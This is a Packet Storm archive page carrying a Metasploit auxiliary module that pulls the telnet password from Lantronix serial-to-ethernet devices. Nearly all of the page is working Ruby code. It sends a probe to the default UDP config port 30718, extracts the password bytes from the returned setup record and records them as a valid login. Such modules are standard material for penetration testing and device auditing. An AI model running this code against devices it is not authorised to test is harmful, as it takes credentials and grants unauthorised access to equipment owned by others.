exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lantronix Telnet Password Recovery

Lantronix Telnet Password Recovery
Posted Aug 31, 2024
Authored by jgor | Site metasploit.com

This Metasploit module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port (30718/udp, enabled by default) and extracts the telnet password. It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1.

tags | exploit, udp
SHA-256 | 774029efa2fb513cbd66b5dcfba4523e04a8ee3ca0b2443ec30d09c92aba2529

Lantronix Telnet Password Recovery

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner

def initialize
super(
'Name' => 'Lantronix Telnet Password Recovery',
'Description' => %q{
This module retrieves the setup record from Lantronix serial-to-ethernet
devices via the config port (30718/udp, enabled by default) and extracts the
telnet password. It has been tested successfully on a Lantronix Device Server
with software version V5.8.0.1.
},
'Author' => 'jgor',
'License' => MSF_LICENSE
)

register_options(
[
Opt::CHOST,
Opt::RPORT(30718),
OptBool.new('CHECK_TCP', [false , 'Check TCP instead of UDP', false])
])
end

def run_host(ip)
setup_probe = "\x00\x00\x00\xF8"
password = nil

begin
sock_opts = {
'LocalHost' => datastore['CHOST'] || nil,
'PeerHost' => ip,
'PeerPort' => datastore['RPORT'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
}
if datastore['CHECK_TCP']
vprint_good("Checking Lantronix TCP Socket #{datastore['RPORT']} on #{ip}")
rem_sock = Rex::Socket::Tcp.create(sock_opts)
else
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
vprint_good("Checking Lantronix UDP Socket #{datastore['RPORT']} on #{ip}")
rem_sock = Rex::Socket::Udp.create(sock_opts)
end
rem_sock.put(setup_probe)
res = rem_sock.recvfrom(65535, 0.5) and res[1]

password = parse_reply(res)
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
print_error("Connection error")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
rem_sock.close if rem_sock
end

if password
if password == "\x00\x00\x00\x00"
print_status("#{rhost} - Password isn't used, or secure")
else
print_good("#{rhost} - Telnet password found: #{password.to_s}")

service_data = {
address: ip,
port: 9999,
service_name: 'telnet',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: password.to_s,
private_type: :password
}.merge(service_data)

credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)

create_credential_login(login_data)
end
end
end

def parse_reply(pkt)
setup_record = pkt[0]

# If response is a setup record, extract password bytes 13-16
if setup_record[3] and setup_record[3].ord == 0xF9
return setup_record[12,4]
else
return nil
end
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close